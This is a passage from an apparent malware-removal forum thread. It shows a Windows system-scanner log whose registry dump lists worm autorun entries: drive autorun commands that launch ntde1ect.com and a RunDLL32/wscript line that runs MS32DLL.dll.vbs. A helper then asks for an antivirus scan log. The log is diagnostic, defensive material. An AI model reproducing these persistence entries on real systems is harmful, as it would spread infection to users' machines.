    2007-09-19 17:53:35 0 d---s---- C:\WINDOWS\Tasks
    2007-09-19 17:53:34 0 d-------- C:\Program Files\Common Files\MSSoap
    2007-09-19 17:53:30 0 d-------- C:\WINDOWS\system32\Macromed
    2007-09-19 17:53:30 0 d-------- C:\WINDOWS\srchasst
    2007-09-19 17:53:23 0 d-------- C:\Program Files\Movie Maker
    2007-09-19 17:53:15 0 d-------- C:\WINDOWS\system32\Restore
    2007-09-19 17:52:24 21640 --a------ C:\WINDOWS\system32\emptyregdb.dat
    2007-09-19 17:51:57 0 d-------- C:\WINDOWS\Registration
    2007-09-19 17:51:43 0 d-------- C:\Program Files\Online Services
    2007-09-19 17:51:34 0 d-------- C:\Program Files\Messenger
    2007-09-19 17:51:30 0 d-------- C:\Program Files\MSN Gaming Zone
    2007-09-19 17:50:52 0 d-------- C:\Program Files\Windows NT
    2007-09-19 17:50:49 0 d-------- C:\WINDOWS\system32\MsDtc
    2007-09-19 17:50:47 0 d-------- C:\WINDOWS\system32\Com


    -- Find3M Report ---------------------------------------------------------------

    2007-09-20 08:18:44 24728 --a------ C:\Documents and Settings\Clement\Application Data\Comma Separated Values (Windows).ADR
    2007-09-19 20:38:44 62 --ahs---- C:\Documents and Settings\Clement\Application Data\desktop.ini


    -- Registry Dump ---------------------------------------------------------------

    *Note* empty entries & legit default entries are not shown


    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "NeroFilterCheck"="C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe" [01/12/2006 03:40 PM]
    "InCD"="C:\Program Files\Nero\Nero 7\InCD\InCD.exe" [11/10/2006 04:19 PM]
    "igfxtray"="C:\WINDOWS\system32\igfxtray.exe" [09/20/2005 05:35 AM]
    "igfxhkcmd"="C:\WINDOWS\system32\hkcmd.exe" [09/20/2005 05:32 AM]
    "igfxpers"="C:\WINDOWS\system32\igfxpers.exe" [09/20/2005 05:36 AM]
    "RemoteControl"="C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe" [11/02/2004 08:24 PM]
    "Acrobat Assistant 7.0"="C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe" [12/14/2004 02:12 AM]
    "WinampAgent"="C:\Program Files\Winamp\winampa.exe" [05/15/2007 01:22 AM]
    "BOC-425"="C:\PROGRA~1\Comodo\CBOClean\BOC425.exe" [08/08/2007 07:49 PM]

    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" [12/23/2006 06:05 PM]
    "avpa"="C:\WINDOWS\system32\avpo.exe" [08/28/2007 11:10 AM]
    "@"="C:\WINDOWS\system32\drivers\scan" []

    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\runservices]
    "LvHidSvc"=C:\WINDOWS\system32\lvhidsvc.exe


    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\C]
    AutoRun\command- C:\ntde1ect.com
    explore\Command- C:\ntde1ect.com
    open\Command- C:\ntde1ect.com

    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{0e8f7abd-66d4-11dc-81f0-806d6172696f}]
    AutoRun\command- C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe MS32DLL.dll.vbs

    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{7a68cf34-6e4c-11dc-bb8a-879a04e4e3e9}]
    AutoRun\command- E:\ntde1ect.com
    explore\Command- E:\ntde1ect.com
    open\Command- E:\ntde1ect.com

    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{d9156e3e-6792-11dc-bb76-806d6172696f}]
    AutoRun\command- C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe MS32DLL.dll.vbs

    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{d9156e3f-6792-11dc-bb76-806d6172696f}]
    AutoRun\command- C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe MS32DLL.dll.vbs

    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{d9156e40-6792-11dc-bb76-806d6172696f}]
    AutoRun\command- C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe MS32DLL.dll.vbs

    -- End of Deckard's System Scanner: finished at 2007-09-30 08:56:20 ------------
     
    Kile,
    #3
  5. 2007/09/30
    noahdfear

    noahdfear Inactive

    Joined:
    2003/04/06
    Messages:
    12,178
    Likes Received:
    15
    Did you run the Panda ActiveScan as recommended? Have a log?
     